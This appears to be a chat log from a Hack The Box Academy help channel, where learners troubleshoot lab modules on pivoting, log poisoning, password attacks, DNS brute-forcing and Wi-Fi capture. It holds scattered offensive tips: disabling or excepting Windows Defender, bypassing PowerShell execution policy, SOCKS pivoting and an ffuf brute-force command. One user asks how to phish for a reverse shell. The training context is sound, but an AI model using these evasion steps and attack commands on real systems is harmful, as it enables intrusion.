makes total sense. Now I cant access curl https://www.inlanefreight.com which should be accessible, and I wonder if I missed any settings.
try terminating the instance and swapping pwnbox locations
I'm assuming this is for the Linux Fundamentals module?
Yes correct
Does terminating the instance kick me out until tomorrow cos I can only spawn up one instance a day?
If you still have time no (as far as I can remember)
Nope.
Free users are allowed 1 Pwnbox spawn per day. Get unlimited Pwnbox access by either subscribing for any plan or buying any amount of cubes in Academy's billing page, https://academy.hackthebox.com/billing
Shit happens. Looks like I have to try tmrw. I report back if changing the pwnbox location helped. Thanks a lot 🙏
You can always just use your own VM and connect to academy through that
@foggy aspen can you do a full refresh Ctrl + f5 and try to spawn it again?
uh, greenfield again, is that a reasonable thing to do for beginners? otherwise it might be exceeding my current skills...
And hey, ctrl + F5 worked, what other magic cheat codes do you know? 🙂
this is just a one off- a staff member noticed you were having issues and reset your limit
thank you guys, very very helpful 🙏
also just for clarification, Discord moderators are NOT staff, we're volunteers
doesn't help.
And I appreciate your help. I wonder if I should reach out to support directly to not spam the discord with my issue. Please say so if you think it makes more sense
how can i start?
Yeah that's rather strange as I've just tested it and it worked fine on my end, go ahead and contact support through the bubble on the bottom right (you might have to disable your ad blocker)
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@vagrant walrus
As the new update for CBBH -> CWSE will remove some modules, for example hacking wordpress, will they remain achievable? Are they just removed from the path or entirely from HTB?
hi,
has anyone else had issues with the SocksOverRDP part of "Pivoting, Tunneling and Port Forwarding" ?
windows defender on the target appears to be detecting + removing the SocksOverRDP-Plugin.dll as soon as i unzip it
im not sure if im doing something wrong, if the env is bugged, or if i am meant to know how to get past windows defender by this point
just noticed the hint so guess its option 3 🙁 , im so bad at this :p
You can add an exception for the DLL file in Defender, but it's still a very janky way of doing things. If you want a more sensible approach, try using ligolo-ng for this instead
i think i managed it once i realised that getting around defender was part of it
Is there any chance someone can help me? Because in my current path, Junior Cybersecurity Analyst,
the module is Components of a Network, the question
"What type of cable is used to connect components within a local area network for high-speed data transfer?"
My answers are:
Ethernet cable
LAN cable
RJ-45 cable
RJ-45 connector
Ethernet cable with RJ-45 connector
Still wrong answer.
Also here
"What type of network cable is used to transmit data over long distances with minimal signal loss?"
My answers are:
Fiber optic cable
Optical fiber
And Still wrong
Anyone could give advice regarding this?
Thank you!
Its a hyphenated word
Also drop the word cable
Its in the reading as well as a hyphenated word
Disable real-time protection
@novel valve dont spoil modules above tier 0
okay so I remove the hyphenated word when answering? Thanks!
You don't remove the hyphenated word, you remove the word "cable"
You can ask here, just dont include spoilers that show things like successful payloads and stuff
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
@opaque cliff ^
Can anyone help me ? i'm stuck in the "Limited File Upload" Module and i dont get the right result with xxe.
Why are you trying to view the image directly?
There are so many articles I don't understand
hm, i'm confused
Take it one step at a time
View the source of the base webpage
I got the answer! Thanks a lot!
you're right I just need to remove the cable word
Write me privately
no
i dont understand it, yeah its just .svg allowed and that is it but i cant see anything in source code when i uploaded it
after clicking upload (if you just uploaded a test.svg, that's not an image) view the page source
Thx 🙂
got it
Ok
So how should i use it
how can I connect to the DC1 ? on this section https://academy.hackthebox.com/module/176/section/1778 I used chisel but not getting a connection back.
You can likely connect to dc1 from your rdp connection
Or rdp
But you may be able to do Set-ExecutionPolicy -scope process bypass before running Chisel
Thanks
if you haven't figured this out already, it wants you to use the input from the given example above. this entire section definitely needs to be rewritten with clearer explanations and question
Not able to spawn an instance while doing the AD module because i'm getting a prompt saying there are no instances available
I frankly still cannot figure out what its asking for. I finished the entire module with no problems except for that question
Change vpn regions, you'll need to download a new vpn
the latency is extremely high for every available region
like 100000ms
i'm trying to spawn a pwnbox instance
Sounds like a network issue
this has never happened before , any solutions?
Restart your router
i was actually using WARP so it might have increased the latency i just switched it off and now it's working thanks!
As the new update for CBBH -> CWSE will remove some modules, for example hacking wordpress, will they remain achievable? Are they just removed from the path or entirely from HTB?
A PowerShell question here, pertaining to File Transfers. Are the asynchronous download options provided in the content because it would be an ideal practice to use an asynchronous download operation on something like a webserver so that there would be no interference with regular operations? I know it is a non-blocking operation for the thread, but what thread exactly are they talking about? Would the OS not schedule my cmdlet either way?
to my understanding, they will simply be removed from the path. they won't be removed from the platform
i would ask support for a concrete answer however
okay
They arent removed from the platform. When some modules were announced they had notes that they would be replacing modules in the cbbh path
i enter it correctly its saying wrong
Space at the end ?
no space
Refresh page and try again
Also please dont share screenshots that may reveal answers :)
sorry mb
still getting the same error even after refreshing 😭
are you sure that is the correct flag? some of the environments contain multiple flags but only 1 of them is correct for the question
i am pretty sure this is the only flag
@limber fog im 99% certain the CDATA method isnt possible in that section
Is anyone available to help me with Windows Lateral Movement. Windows Remote Management: Q3?
I was able to authenticate as Helen on DC previously.
is there any new updated info on "Nibbles" as everything is 4 years old and not really helpful imo.
Review the ways you can execute commands.
It hasn't been updated
So old stuff should still be relevant
I had made a dumb mistake, it worked
okay, thank you but its not helpful to me. ill keep looking.
Are you referring to the sections in the "getting started" module or the retired machine itself
I was talking abt that section
the getting started stuff, theres no similarities to the stuff i find on yt guiding it.
Interesting, I dont recall getting the CDATA method working
Hey guys, i just kinda finished starting point machines.
You should be able to follow it and it worked just fine
So I'm kinda very new
like i upload the .php and get the errors, can log in and all but once they start throwing random stuff out and skipping steps is what confuses me
Please help me out, how do I get better? I am struggling with easy web machines 🥲
eh easy to just say that
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Did you take notes while going through starting point?
There's some basic web modules in htb academy which might be useful to cover some basics for foothold
I am Computer Science graduate, currently an Application security intern
So I have a good hold on fundamentals... But I get slapped when it comes to understanding code and figuring out exploits
This channel is for assistance with academy modules, not for anything outside of that
General chats aren't open, where can I discuss about this?
#welcome explains how to gain access to more of the server, as I stated
Cybersecurity roadmap for beginners?
this support is garbage, ill just figure it out myself. hes a glorified bot spouting one word replies. yikes
Thanks
Im not staff, im just a community volunteer. It helps others help you if you explain or give the errors youre receiving
A common problem ive seen in the getting started module is people not replacing the placeholder ip in the example php command
CS graduate? What languages did you learn in your program and what do you mean get slapped when it comes to understanding code and figuring out exploits?
I couldn't figure out how to create my own payloads.
So far I've only done DSA based coding, and got some hands-on development experience (practice projects)
No one here is your help monkey, they are humans. Read, google, and jesus christ calm down.
They already left
I think what I'm lacking is ... Being able to read documentations and figuring out stuff with just "google"
I was thinking ill be good to go with that
i dont take it personally tbh ¯_(ツ)_/¯
👍🏻
Similar to all other coding, when you find a machine is vulnerable to a particular exploit, read the code, try to understand it and replicate it.
Im sure you have seen it all
A common search pattern for me:
"How to do x in linux"
"man (toolname)"
"Am I good enough to have imposter syndrome"
🤣🎉
Alright, thanks for that.
She is right, you have to get very specific with your questions. The more specific the better answer you can get
Also let's try and keep this channel on topic 😉
But yh, being able to understand online documents and CVE's is my next step.
ChatGpt said it, he's cool at times.
sometimes you cant get an answer at all even from google unless you know what to ask
Sometimes getting too specific hinders your search
Keywords are what really matter
Documentation for sure is the literal most important thing when writing software
How long would it take me to be able to pwn new machines and rank up? Atleast upto medium difficulty.
Just asking so that I don't over expect from myself. Haha.
On this platform? Hard to say. I don't know what you're doing or how long you are doing it for.
The skill curve has exponentially changed from 4 years ago to now (4 years being the starting point machine)
but she is right, this is off topic
Easy now is around hard from 4 years ago due to skill floor difference
I don't care if it takes me an year tbh, I've all the time - I'm still young hahaha
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Medium boxes can definitely be done in a year of diligent daily effort
especially since you have a foundation in CS. That is what really helped me get a leg up in this.
You will however be lacking in networking fundamentals unless that was in your curriculum for some reason
and OS stuff too
Yh, I didn't feel lost in starting point machines at all (except that I had to understand windows internals 😑).
Got humbled when I started new machines
Yep, they both were in my curriculum
academy has two modules that would be great for you, windows fundamentals and linux fundamentals (if you don't already know a decent amount about linux)
Those two will be your bread and butter, so surface level knowledge really won't cut it
I've been playing around with Linux for 2 years now. I got a hang of it. Recently installed kali as my local OS.
Previously I used Arch
I use arch btw lol, but no seriously youre on a good start. dont get discouraged, hacking is its own game too. Treat it like you were having to learn conditional statements and for loops again. It will compound
Yh man, thanx alot.
Thanks to you too @fathom pendant
I need to install pyftpdlib for the File Transfer module. The install instructions recommend pip3, I know best practice is typically pipx but since this is a library and not a command line utility, should I just use pip3? I can't think of any way that it would negatively impact my environment beyond occupying disk space
I don't know if its just me but this password attacks skill assessment is literally killing me. I did like 75% of this module before it was updated (left it midway and moved onto others) completed everything upto attacking common applications including AD but man this is too hard for me. Is there anything that I should learn before trying to do this skill assessment. I'm totally lost.
anyone got a updated writeup for the password attacks module
It's above tier 0, so making a writeup would be against the terms of service.
oh ok
Hello Everyone
Walking through CPTS path - let's do this together with and as a team -
One of us in Windows Privilege Escalation - if you here as well, never hesitate to DM
hello all, I'm facing an issue in File Inclusion -> Server Log poisoning, i manipulate the User-Agent header and see the output containing the CMD or any other string i give, however again when i try to /var/log/apache2/access.og&cmd=id or any other command it gives me the blank page
what am i doing wrong
Anyone available to lend a hand with Introduction to Deserialization Attacks Skill Assessment 2?
I managed to get the first question and I'm able to obtain the admin cookie, but I'm stuck on the second question in regards to the PHP Gadget. I'm pretty sure I have the right version but the server is not executing my code.
Have you looked closely at the log? ||There are characters that you must not use, because otherwise you will destroy the log file.||
nope, you mean i read the content of the log
maybe the log file is kept destroying
Hey I need help in solving HTB lab..I got stuck... I have access of mail account of client X . Now I want to do phishing attack on client Y . Client Y only click the link sent by client X. How to get reverse shell of client Y ?? Can anyone help me ?? Expert please
Take a close look at the log file and think about what happens when you insert characters somewhere.
Well, without knowing which module and section you are working in, it is impossible to give you any tips.
You can send me a DM.
Hi, did you find a solution for this? I'm running into the same problem...
I got the flag, basically the issue was if i send multiple requests in repeater (3-4 times) it crashes it or deletes the log file, so carefully trying it gave me the flag.
although i was using single quote.
although can you please refer the characters you were talking about.
try pipx; if pipx doesn't work pip3 (you'll need to add --break-system-packages)
aw0ken has given you the character
or reading the log carefully, imo it was far easier for me to review in view-source mode rather than the formatted page view
ah yeah
Hello ! I am in password attacks - pass the ticket module and when I try to solve it using my local Kali vm I get a lot and I mean a lot dependencies issues with the tools etc. also when I somehow managed to fix them I get error from the target domain that the time is not the same as mine but I don’t know a way to find out the domains time
once to set the poison twice to activate
faketime is one method
I don’t know the domains time though so that I make mine the same as its time
there's a command somewhere in this chat that has the syntax i'm sure if you search this chat for 'faketime' you'll find it
ntpdate
ntpdate*
not update
all i did was search 'faketime' and it was a few messages down
i just forwarded the first relevant one ¯_(ツ)_/¯
lol i've never needed it so i don't have the syntax offhand
What does blood mean?
Like pertaining to boxes and cyber security
Are those the only things you can get from hacking into a box?
Yeah
i've never had to do it
i've gotten lucky (I'm in the US, and i've never had a clock skew error, just lucky ig)
So where it says command where what am I supposed to write ?
the command you're trying to run
And it is going to run as if I had the same date as the target ?
yes
Also in this module I get too many dependencies errors that htb does not mention . Is that normal ? I use latest version of Kali
make sure your kali is fully updated
sudo apt update && sudo apt upgrade
then restart the vm
The easiest way to run such python things is in a virtual environment.
Yes, a little bit under my first message someone answered me, using UV basically fixed the issue
Hey i'm working on the attacking DNS section in Attacking common services, the question tells you to use subbrute and I used the exact commands that it said in the module but the program is running into a list index out of range error. The section only put "ns1.inlanefreight.htb" in the resolvers.txt file and I did the same so I'm not sure why the result is different. I also made sure to add inlanefreight.htb to my /etc/hosts file just in case that was needed. Does anyone know how to get this command to work? ./subbrute.py inlanefreight.htb -s ./names.txt -r ./resolvers.txt
thank you! found the messages and got it to work. I previously downgraded only to 16.7.19 which also didn't work. It worked with frida 16.1.11 and the matching frida-tools (which really was easy with uv as shown in your response)
use the ip instead
you'd need to add ns1.inlanefreight.htb to your hosts file as well btw
if you're not using the ip*
how do i read the contents of flag.txt in metasploit module “use the metasploit framework to exploit the target with eternalromance. find the flag.txt file on administrators desktop and submit the contents as the answer”
I’m in the shell right now
keyword Administrator
:)
(administrator is a user on Windows machines much like root on linux)
I did this but I'm getting the same error. My resolvers.txt is just ns1.inlanefreight.htb and the command I used was ./subbrute.py 10.129.14.91 -s ./names.txt -r ./resolvers.txt
replace ns1.inlanefreight.htb with the spawned ip
(also the ip for the ns1.inlanefreight.htb ns would be the ip of the target, if it's even configured)
well unfortunately im already in a shell
do i have to restart the process

go to C:/Users/Administrator
you should be NT Authority/System yeah?
if you do whoami
yes
then you can access anywhere on the system
\
if you're unsure of navigation within a windows environment, there's a windows fundamentals module and intro to windows CLI module
the question tells you exactly where to look for it
Used the same command but made the resolvers.txt the ip but im still not getting anything
have patience atp
just let it run for a few minutes and you may receive some information
gotchu thanks
also it's best to use http://inlanefreight.htb not the ip for subbrute iirc
./subbrute.py <hostname> -s ./names.txt -r ./resolvers.txt
Is my computer slow or is this web vm slow
well ensuring you did everything right is step 1
I struggled too don’t worry, glad you were able to do it. Good luck !
it's @ serious rule break role if you need to get the mods attention
O
@fathom pendant sry, was unable to find the right place. Somebody directed me here
well whoever directed you here directed you to the wrong place
I don't know any server that is for what you're asking for. Not only that we cannot verify any bit of information that you give us as truthful
@fathom pendant sure, i see your point. Thanks for clarification
I’m confused on why every hacking tutorial/course for metasploit is based off of the eternalblue module
Wait if i'm letting it run but these errors are still popping up should I keep waiting? @fathom pendant
try instead inlanefreight.htb not specifying http
yeah i forgot the syntax for this doesn't use the protocol specification
(this is shown in the reading as well)
Yeah I tried this one too. I have it running now. No matter what i've put there the same error pops up I was just wondering if the script is still working or if the error is breaking it
Hi everyone, i got some questions. The first one is why i have 4 interfaces with the same IP (is it possible that it happened now when i connected my pc via ethernet?), the second one is why the academy target host is down, however if i run ping <ip> it works sometimes
is the ip inlanefreight.htb in your /etc/hosts ?
this is from the openvpn process not terminating properly
sudo killall openvpn
tl;dr the openvpn pack uses a static ip-addressing schema, not dynamic
dont understand
yeah
that was to someone else, not you
have i to run this command?
yes because you have multiple openvpn processes running
sorry
so it's easier to kill all, then move forward
give me a sec for sanity check
Hello, am in Intro to Assembly Language and am stuck on final exercises. Anyone can give me a hint with this?
@wheat silo spawned a fresh target; only thing i have in the resolvers file is ip, ran the command as shown in the example, got the expected results no errors
Ok Im gonna reset the vm and the target and try that
@teal arrow Please take care not to post content from modules above tier 0, especially skill assessments
Honestly thought I didn't expose anything, everything I asked about was within the module explanation. but my bad
as a note, spoilering an image really doesn't do much of anything. As anyone can still click on it.
Your image revealed an attack path for a skill assessment
the explanation inside the module is content from the module as well
Oh yeah you're right I see what path you're talking about. Were you able to look at the different outputs though, do you know if I'm doing anything wrong?
Are there any modules that are free to learn networks etc
The first image is the output from the wget command executed on the reverse shell with the target, and the second one is the output from the server in listening. Can anyone explain to me why the permission is denied?
I got the LinEnum.sh file in the same directory where the server is running on
It says you cannot write to the home directory, so try /tmp
where do u read it??
Don't you want to execute it? You could read it on your VM if you wanted to read it.
I meant where did you read that i cannot write to the home directory
which part of the output says this?
The part that says Cannot write to 'LinEnum.sh'
Hi guys i have a problem with the File upload whitelist filter: i get the valid extension, then after i send it and try to execute it, it responds with 404 and one of them gives me 403
ok but why have you supposed that this means the home directory?
sorry for the bad english
Don't sweat it, you're good.
This is Getting Started? Which section?
if i read "Cannot write to <file_name>", for me it sounds like "Hey, you cannot write nothing in this file"
@gray yacht can you help me
Yeah as in you cannot create the file in the current directory. The user you currently are doesn't have those permissions. You can try to write it to the /tmp directory instead of the home directory.
thank you
If you are still having issues with that, let me know I will be here for a bit longer.
You are having issues with File Upload Attacks - Whitelist Filters?
yes
it gives me 403 when i try to access the file
You can DM what you are trying.
Hello
Escalate the privileges on the target and obtain the flag.txt in the root directory. Submit the contents as the answer.
solved
Doing the Attacking WPA/WPA2 Module and I'm on the PMKID chapter doing the 2nd exercise "Perform the PMKID capture as demonstrated in this section. What is the discovered value of the WPA PSK? "
I ran the attack and generated the hash, but it's been nearly a half hour with no results. I'm just using rockyou.txt on my own machine. These exercises haven't taken this long before so just wanted to check and see if I'm maybe using the wrong wordlist or something?
hey i wanna check for available users on a smtp server. i can do the vrfy command are there easy ways to bruteforce this or find available user because i am trying it with a personal bash script but making it is not going smoothly and seems inefficient ?
Take a look at this tool
https://pentestmonkey.net/tools/user-enumeration/smtp-user-enum
should be a tool available on kali and parrot by the same name as pb just linked
oh okay i will look into it thanks i just also read that metasploit also has a tool
yep
i am curious how they work because i get kicked out because i have too many errors so i might need to look that up haha
they do a connect, ask, wait, quit from what i know
oh so a different connection per user they try ?
oh okay thank you
also thank you pb
i like making some tools of my own so i might try that later down the line
okay so i tried the metasploit tool but i can't seem to find any user i have tried on my own machine and on the pawnbox
any clues on what i am doing wrong ?
Sliver Module
spawndll for generated dll beacon and execute-assembly for beacon binary did not work for beacon establishment from within session
only uploading and "execute" worked
Can help?
Idk if you need to tweak the wait time
it is not an option haha like i get the message that it is complete but no user is found and i have used the standard username list from metasploit and also the one from seclists
both get no results
There's a username list in the >resources< tab
u mean another list to bruteforce ?
Yes.
ah okay i will try it haha
By resources tab I mean the page has a button that's labeled "resources"
yes thank you i found it trying em out as we speak
still says that the module is completed but he doesn't give me any other output
Try with the smtp-user-enum tool (the wait time should be > 15 at least)
Hi
so not via metasploit u mean ?
i am so confused because i googled a write up and the name is in the wordlist haha
ahh rockyou.txt will be your friend unless it takes forever, thus so many alarms were raised
Hey where do we report a problem in a machine?
an Academy machine?
It was an htb machine but it's ok. I didn't have the reflex to add a DNS entry in /etc/hosts for the website because it ain't a public website
Common error
You should use twitter literally there are many good folks :v
I personally like to use aquatone as it's quick and easy
Looking for a nudge on Password Attacks Skills Assessment; I've got creds for j* on (172...13)/ user: d on (172...7 & 10). Cannot seem to make any progress further. Are we somehow supposed to rdp or xfreerdp on to 172..*.7 (10) or 11??
Hey, which server are you trying to get on?
i've used ligolo-ng to pivot to each, the particular one i am trying to get on right now is jump01
I can't seem to rdp into anything, no evilwinrm, psexec etc
I finished Password attacks module thanks for help here!
If you have RDP on FILE01, open up "Remote Desktop Connection" and connect to JUMP01 with the new creds
I did it today, You need to search a lot
You need to search the next access in DMZ01
yea, so i have the next access, but rdp will not work. I have creds to rdp into FILE01 and JUMP01
rdp keeps erroring out
What error do You get?
One sec
[21:20:21:167] [259243:259244] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success
[21:20:21:167] [259243:259244] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[21:20:21:722] [259243:259244] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 0: Success
[21:20:21:722] [259243:259244] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[21:20:21:722] [259243:259244] [ERROR][com.freerdp.core] - freerdp_post_connect failed
Did you try using proxychains xfreerdp
and did you add the hosts into your /etc/hosts?
I've tried proxychains with SSH pivot... that was an utter failure. I forgot to add to /etc/hosts ... >.<
ssh -D 9050 to establish a SOCKS proxy, proxychains xfreerdp for windows hosts
But yeah, the hosts file is very important
Try with domain\user or put username and then domain and password
just got into jump01 with proxychains... thank you
I tried with ligolo and it works fine for me
Glad you got it !
it was definitely a /etc/hosts error on my part. I too just got ligolo working with xfreerdp
describe it better, what all you’ve tried and someone might be able to help you
oki ty btw
Hey guys! I'm stuck on the Password Attacks Skills Assessment and was wondering if anyone can give me a nudge!
I have creds for the fi* user and RDPed into the WIN-HARD machine. There, I found hashes for the db but I'm not able to crack them nor pass them to gain a further foothold. Would appreciate it if anyone can help me how to go forward! Thanks
Ligolo works just fine
@zinc wigeon intro to asm is above tier 0
wdym
It means don't post snippets or anything of your code for the skill assessment, as that's spoiling information for modules above tier 0
[See channel info]
I believe there is a problem in the machine of blind sql injection module, the time-based section. When I turn on the machine and access the ip, it only shows the machine of the boolean-based sql injection?
Could be reused asset but different vuln
I think so too. I tried but didnt get any sign that it is so, and even the identify section show a different UI
Did you try navigating to ip:8080?
Also idk why they have the uri being view-source
Are you still online?
oh yes, thank you a lot! It works
Hi, I wanted to know that if I am unable to perform zone transfer the next step is to perform bruteforcing ? Do I need to bruteforce NAMESERVER as well ?
For example :- dnsenum bruteforce on ns.inlanefreight.htb ?
Hi, i'm new to all this stuff, i wanted to know if there was any way of getting cubes without paying
hi
Invite friends. When they pay for cert you will get some cubes.
I dont have friends
I guess this will be your first real hacking challenge. Make friends.
Social engineer some friends.
Like ye i have them is just that nobody wants to learn this
Social engineer them into wanting to learn cybersec
good idea bro
Try doing free hackme to get better. Join their discord and hang out with people in the voice chat. Do some boxes with people. Impress them and convince them HTB was your reason for being good. Get the invite.
Thank you for recognizing my contribution to this community. 
sure it is
I dont think im going crazy after a fresh reset it still doesnt list all privileges
is it meant to be like this?
https://academy.hackthebox.com/module/67/section/642
Hi I'm a beginner in thehackthebox I search for team to develop my skills
module Attacking Common Applications - Attacking Thick Client Applications
i run this 191E bat file and it doesn't create any file in c:\programdata\.
we wait a few minutes to spot the oracle.txt file which contains another file full of base64 lines, and the script monta.ps1 which contains the following content, under the directory c:\programdata.
even with the previous user jordan (even though jordan doesnt have the correct privileges)
i guess run as powershell with administration may work
cant it wont allow even when I copied and paste the password...
wait now either HTB is god tier ragebaiter or im going insane
because it worked why not sure, but cheers for helping i started that same module as you on rn but way behind web is so weak for me
it works run powershell as administrator
hey everyone. I am doing Wi-Fi Penetration Testing Basics , Skills assessment. I have ||started airodump-ng and done a deauth attack, getting the handshake but the capture isn't producing a PCAP. What am I doing wrong?||
nevermind. solved it. for anyone in the future, ||it won't save as a pcap so run the crack against the cap file after you capture the EAPOL handshake from deauth.||
Hi .. im new to htb and started linux fundamentals ... but i cant use any browser or install any vpn due to network issues inside linux .. but pinging sites and their ip works .. curl v4 test fails .. i need help
if you can ping, then you have a connection
what do you mean by you cant use your browser?
and you don't need to install a vpn. you use openvpn with the downloaded *.ovpn files
Hello everyone, I need help with Broken authentication module
ask the question mate
it says my connection timed out
It's the enumerating usernames section. I am using this command but no help i can't find the username. Am I doing something wrong? ffuf -w /home/neo/Wordlists/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords.txt -u http://94.237.61.242:34580 -X POST -H "Content-Type: application/x-www-form-urlencoded" -d "username=FUZZ&password=invalid" -fr "Unknown user" -t 40
so you can open up your browser. so its not the browser. can you reach google.com or other company sites?
no i cant reach any sites .. the browser open ups , but whenever i try to reach a site , eg discord.com , it says my connection timed out
first thing is you're using passwords to fuzz a username?

